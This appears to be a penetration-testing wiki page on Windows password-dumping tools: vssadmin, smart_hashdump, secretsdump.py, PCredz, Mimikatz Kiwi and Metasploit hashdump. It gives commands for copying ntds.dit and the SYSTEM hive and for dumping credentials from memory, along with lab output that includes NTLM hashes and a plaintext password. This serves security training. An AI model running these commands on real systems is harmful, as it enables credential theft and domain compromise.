vssadmin

⚠ Only present on Domain Controllers

Description

The Windows Volume Shadow Service. It can be use to make copies of files that are currently in use (including ntds.dit).

Platform	Windows
Author	Microsoft
License	Windows
URL	vssadmin

Usage

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
---- Commands Supported ----
 
Delete Shadows        - Delete volume shadow copies
List Providers        - List registered volume shadow copy providers
List Shadows          - List existing volume shadow copies
List ShadowStorage    - List volume shadow copy storage associations
List Volumes          - List volumes eligible for shadow copies
List Writers          - List subscribed volume shadow copy writers
Resize ShadowStorage  - Resize a volume shadow copy storage association

Examples

vssadmin list shadows

This will list any existing shadow copies.

C:\WINDOWS\system32>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
Contents of shadow copy set ID: {34e68305-975f-4d17-8655-4993d495a4e7}
   Contained 1 shadow copies at creation time: 3/17/2022 5:14:25 PM
      Shadow Copy ID: {670f6106-3968-4656-a8cc-a822f2222719}
         Original Volume: (C:)\\?\Volume{f99d1339-fef8-4d0c-92f0-df3a6876270d}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: DESKTOP-TI18DM9
         Service Machine: DESKTOP-TI18DM9
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

You can then copy files from the shadow volume, like ntds.dit for example.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit

Then you need to copy the SYSTEM hive to get the encryption key.

reg save hklm\system C:\windows\temp\system /y

vssadmin create shadow /for=c:

This will create a new shadow copy of the C drive. Alternatively, you can run this command in Powershell.

(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')

Blog Posts

smart_hashdump

⚠ Use on Domain Controllers only. Use the regular hashdump for non-DCs.

Description

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

Platform	Windows
Author	Carlos Perez
License	BSD 3-Clause
URL	smart_hashdump.rb

Usage

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  GETSYSTEM  false            no        Attempt to get SYSTEM privilege on the target host.
  SESSION                     yes       The session to run this module on

Examples

run post/windows/gather/smart_hashdump

This is all there is to it.

Blog Posts

secretsdump.py

Description

Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\\Temp dir) and read the rest of the data from there.

Platform	Python
Author	Alberto Solino
License	Modified Apache License 1.1
URL	secretsdump.py

Usage

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
                      [-security SECURITY] [-sam SAM] [-ntds NTDS]
                      [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
                      [-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
                      [-pwd-last-set] [-user-status] [-history]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                      [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
                      [-target-ip ip address]
                      target
 
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
 
positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
                        or LOCAL (if you want to parse local files)
 
optional arguments:
  -h, --help            show this help message and exit
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -system SYSTEM        SYSTEM hive to parse
  -bootkey BOOTKEY      bootkey for SYSTEM hive
  -security SECURITY    SECURITY hive to parse
  -sam SAM              SAM hive to parse
  -ntds NTDS            NTDS.DIT file to parse
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only
                        available to DRSUAPI approach). This file will also be
                        used to keep updating the session's state
  -outputfile OUTPUTFILE
                        base output filename. Extensions will be added for
                        sam, secrets, cached and ntds
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
 
display options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach. Implies also
                        -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos
                        keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.
                        Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -keytab KEYTAB        Read keys for SPN from keytab file
 
connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it

Examples

secretsdump.py -ntds ./ntds.dit -system ./system -outputfile /tmp/hashes.txt LOCAL

This will dump the hashes from a saved copy of ntds.dit using the encryption key in a saved copy of the SYSTEM hive.

Blog Posts

PCredz

Description

This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.

Platform	Linux
Author	Laurent Gaffie
License	GPLv3
URL	https://github.com/lgandx/PCredz

Usage

usage: Pcredz [-h] [-f FNAME | -d DIR_PATH | -i INTERFACE] [-c] [-t] [-v]
 
Pcredz 1.0.0 Author: Laurent Gaffie
 
optional arguments:
  -h, --help    show this help message and exit
  -f FNAME      Pcap file to parse
  -d DIR_PATH   Pcap directory to parse recursivly
  -i INTERFACE  interface for live capture
  -c            deactivate CC number scanning (Can gives false positives!)
  -t            Include a timestamp in all generated messages (useful for
                correlation)
  -v            More verbose.

Examples

sudo Pcredz -vf /tmp/winauth.pcap

This will attempt to extract creds or other interesting information from the provided pcap file. We can then use john or hashcat to crack the extracted NTLMv2 hash.

user@slingshot:~$ sudo Pcredz -vf /tmp/winauth.pcap
Starting PCredz...
Pcredz 2.0.2
Author: Laurent Gaffie
Please send bugs/comments/pcaps to: laurent.gaffie@gmail.com
This script will extract NTLM (HTTP,LDAP,SMB,MSSQL,RPC, etc), Kerberos,
FTP, HTTP Basic and credit card data from a given pcap file or from a live interface.
 
CC number scanning activated
 
Using TCPDump format
 
protocol: tcp 192.168.78.129:58134 > 192.168.78.128:445
NTLMv2 complete hash is: clark::WORKGROUP:44a05f29e1c2534d:B86D2E3E3D8678A2DEB1E3D02AB2F510:010100000000000013DCEC4AA939D80164541AA67023DFDC0000000002001A00530045004300350036003000530054005500440045004E00540001001A00530045004300350036003000530054005500440045004E00540004001A00530065006300350036003000530074007500640065006E00740003001A00530065006300350036003000530074007500640065006E0074000700080013DCEC4AA939D8010600040002000000080030003000000000000000000000000000000090A0E4593F39BEEA0158A182FBAAF7F73CB2CFB5FF586EF3994BC0061253F54A0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00370038002E0031003200380000000000
 
 
/tmp/winauth.pcap parsed in: 0.0382 seconds (File size 0.00506 Mo).

Additional Details

Stores output in /opt/pcredz/CredentialDump-Session.log
Also creates /opt/pcredz/logs directory with files named after the hash types found.

Blog Posts

Mimikatz Kiwi

Description

Mimikatz is a well known tool to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. Kiwi is the Metasploit implementation.

Platform	Windows
Author	gentilkiwi (Benjamin DELPY)
License	Creative Commons 4.0
URL	https://blog.gentilkiwi.com/mimikatz

Usage

Kiwi Commands
=============
 
    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Examples

load kiwi

This command will load the Mimikatz module in a Meterpreter session.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
 
Success.

creds_all

This will attempt to dump all the Windows credentials from RAM.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
 
Username  Domain         NTLM                              SHA1
--------  ------         ----                              ----
sec       SECSTUDENT     396f460962c665bc648db299d55f1ba2  4029ce95b7a89f3c63148d94e789c0350e069ef4
 
wdigest credentials
===================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
SECSTUDENT$     SEC            (null)
sec             SECSTUDENT     (null)
 
kerberos credentials
====================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
sec             SEC            sec123
secstudent$     SEC            (null)

Blog Posts

hashdump

Description

This module will dump the local user accounts from the SAM database using the registry.

Platform	Windows
Author	Metasploit
License	BSD 3-Clause
URL	hashdump.rb

Usage

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on

Examples

run post/windows/gather/hashdump

Here are the results of running this command from a meterpreter session.

meterpreter > run post/windows/gather/hashdump
 
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 2609c40b5e36c810763cbc8bf8962276...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
 
No users with password hints on this system
 
[*] Dumping password hashes...
 
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin:1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus:1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez:1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker:1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray:1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson:1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara:1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout:1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen:1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker:1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller:1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins:1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera:1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins:1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper:1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton:1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte:1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams:1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos:1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates:1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen:1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry:1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates:1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant:1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson:1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy:1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook:1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin:1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge:1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne:1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan:1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie:1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::

Blog Posts

Tag: password dumping